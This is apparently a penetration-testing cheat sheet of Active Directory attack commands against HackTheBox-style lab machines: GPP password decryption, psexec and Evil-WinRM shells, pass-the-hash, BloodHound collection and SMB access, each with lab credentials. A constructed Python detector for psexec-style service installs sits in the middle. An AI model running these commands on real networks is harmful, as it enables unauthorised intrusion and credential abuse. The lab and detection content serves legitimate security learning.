AD Authentication
Decrypting the GPP hash
# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
Authenticating to obtain a shell
# impacket-psexec active.htb/administrator@10.10.10.100
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file jpVGLnQj.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service avKJ on 10.10.10.100.....
[*] Starting service avKJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
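A detection-side view of the session above, as an added example that is not part of the original page: the transcript shows an 8-letter executable copied to ADMIN$ and a 4-letter service created, which the target records as a service-install event (Event ID 7045). The event records, host names and severity labels below are constructed, and the name-shape heuristics are an assumption drawn from the names in this transcript.

```python
import re

# Constructed service-install records (System log, Event ID 7045), reduced to
# the fields used here. Host names are invented; the first record reuses the
# service and file names visible in the transcript above.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "dc.example.test", "ServiceName": "avKJ",
     "ImagePath": r"%systemroot%\jpVGLnQj.exe"},
    {"EventID": 7045, "Computer": "dc.example.test", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 7045, "Computer": "ws1.example.test", "ServiceName": "Sync",
     "ImagePath": r'"C:\Program Files\Sync\syncsvc.exe"'},
    {"EventID": 7045, "Computer": "ws2.example.test", "ServiceName": "UpdaterSvc",
     "ImagePath": r"C:\Windows\qWErtYui.exe"},
    {"EventID": 7036, "Computer": "dc.example.test", "ServiceName": "avKJ"},
]

# Assumed heuristics: a 4-letter service name, and an 8-letter .exe sitting
# directly in the Windows directory (the folder that ADMIN$ exposes).
NAME_RE = re.compile(r"^[A-Za-z]{4}$")
PATH_RE = re.compile(r"^(?:%systemroot%|[a-z]:\\windows)\\[a-z]{8}\.exe$", re.IGNORECASE)


def classify(event):
    """Return 'high', 'medium' or None for a single event record."""
    if event.get("EventID") != 7045:
        return None  # only service installations are of interest
    path = event.get("ImagePath", "").strip().strip('"')
    path_hit = bool(PATH_RE.match(path))
    name_hit = bool(NAME_RE.match(event.get("ServiceName", "")))
    if path_hit and name_hit:
        return "high"    # both shapes match the session shown above
    if path_hit:
        return "medium"  # binary dropped in the Windows root, name differs
    return None          # a short name alone (e.g. "Sync") is not enough


def suspicious_services(events):
    """List (computer, service, severity) for every flagged record."""
    hits = []
    for event in events:
        severity = classify(event)
        if severity:
            hits.append((event["Computer"], event["ServiceName"], severity))
    return hits


if __name__ == "__main__":
    for hit in suspicious_services(SAMPLE_EVENTS):
        print(*hit)
```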
Validating credentials with crackmapexec against the WS-Management service
crackmapexec winrm 10.10.10.111 -u 'fsmith' -p 'Thestrokes23'
Authenticating with Evil-WinRM against the WS-Management service
$ evil-winrm -i 10.10.10.111 -u 'fsmith' -p 'Thestrokes23'
## Uploading files from the local machine to the victim machine with Evil-WinRM
*Evil-WinRM* PS C:\Users\FSmith\Desktop> upload PrivescCheck.ps1
## Connecting over WinRM with a hash
evil-winrm -i 10.10.10.111 -u 'Administrator' -H 823452073d75b9d1cf70ebdf86c7f98e
Using the BloodHound ingestor
bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.10.10.111 -c DcOnly
Accessing the SMB service with a domain user
smbclient -U svcorp.com/alice%Password01 \\\\10.10.10.111\\Docs
smbmap -u "alice" -p "Password01" -H 10.10.10.111 -d svcorp.com